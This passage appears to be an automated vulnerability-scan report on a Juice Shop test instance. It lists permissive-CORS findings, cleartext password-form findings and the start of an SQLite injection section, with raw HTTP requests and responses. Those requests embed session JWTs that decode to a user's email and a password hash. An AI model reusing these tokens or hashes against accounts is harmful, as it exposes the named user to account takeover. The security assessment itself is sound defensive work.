Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:10 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.69. http://192.168.61.143:3000/public/images/products/css/app.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/css/app.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://udwfgycclqea.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/css/app.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://udwfgycclqea.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:20:27 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.70. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/dist/juice-shop.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lzsyblbevkxj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://lzsyblbevkxj.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:21:57 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.71. http://192.168.61.143:3000/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /redirect

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://guajreddqaln.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /redirect HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://guajreddqaln.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:21:14 GMT
Connection: close
Content-Length: 1923

<html>
<head>
<meta charset='utf-8'>
<title>TypeError: Cannot read property &#39;indexOf&#39; of undefined</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
paddin
...[SNIP]...
2.72. http://192.168.61.143:3000/rest/admin/application-version

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/admin/application-version

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://jdofgaapvhxo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/admin/application-version HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://jdofgaapvhxo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 20
ETag: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
Date: Sun, 15 Jan 2017 21:22:22 GMT
Connection: close

{"version":"2.20.0"}
2.73. http://192.168.61.143:3000/rest/basket/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://phmpuvfudzqj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/basket/4 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg; email=mike_landeck%40hotmail.com
DNT: 1
Connection: close
Origin: http://phmpuvfudzqj.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 153
ETag: W/"99-axOzVV99lvE3JynBcKuo6Q"
Date: Sun, 15 Jan 2017 21:45:29 GMT
Connection: close

{"status":"success","data":{"id":4,"coupon":null,"createdAt":"2017-01-15T21:44:54.000Z","updatedAt":"2017-01-15T21:45:28.000Z","UserId":7,"products":[]}}
2.74. http://192.168.61.143:3000/rest/basket/4/checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/basket/4/checkout

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://rmrpxqvmkxdl.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/basket/4/checkout HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://rmrpxqvmkxdl.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:22:26 GMT
Connection: close
Content-Length: 2010

<html>
<head>
<meta charset='utf-8'>
<title>UnauthorizedError: No authorization token was found</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
padding: 80px 100
...[SNIP]...
2.75. http://192.168.61.143:3000/rest/product/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://myujkfojcrkp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/product/search?q=orange HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://myujkfojcrkp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 282
ETag: W/"11a-02U7qfvsMA/pfm4fo5BHdg"
Date: Sun, 15 Jan 2017 21:40:40 GMT
Connection: close

{"status":"success","data":[{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15 21:
...[SNIP]...
2.76. http://192.168.61.143:3000/rest/user/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/user/login

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://tbacmsxbvjgj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/user/login HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://tbacmsxbvjgj.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Date: Sun, 15 Jan 2017 21:22:43 GMT
Connection: close
Content-Length: 1942

<html>
<head>
<meta charset='utf-8'>
<title>Error: Unexpected path: /rest/user/login</title>
<style>* {
margin: 0;
padding: 0;
outline: 0;
}

body {
padding: 80px 100px;
font:
...[SNIP]...
2.77. http://192.168.61.143:3000/rest/user/whoami

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /rest/user/whoami

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://nomgzxuirdbb.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /rest/user/whoami HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://nomgzxuirdbb.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 43
ETag: W/"2b-FMn/4uFOBvpEHr18dhkCVQ"
Date: Sun, 15 Jan 2017 21:13:17 GMT
Connection: close

{"id":7,"email":"mike_landeck@hotmail.com"}
3. Cleartext submission of password

There are 3 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

3.1. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
<div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
...[SNIP]...
3.2. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
</h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="error && !form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required/>\n </div>
...[SNIP]...
3.3. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
</h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
...[SNIP]...
4. Interesting input handling: SQLite injection

There are 2 instances of this issue:

4.1. http://192.168.61.143:3000/rest/product/search [q parameter]

Summary

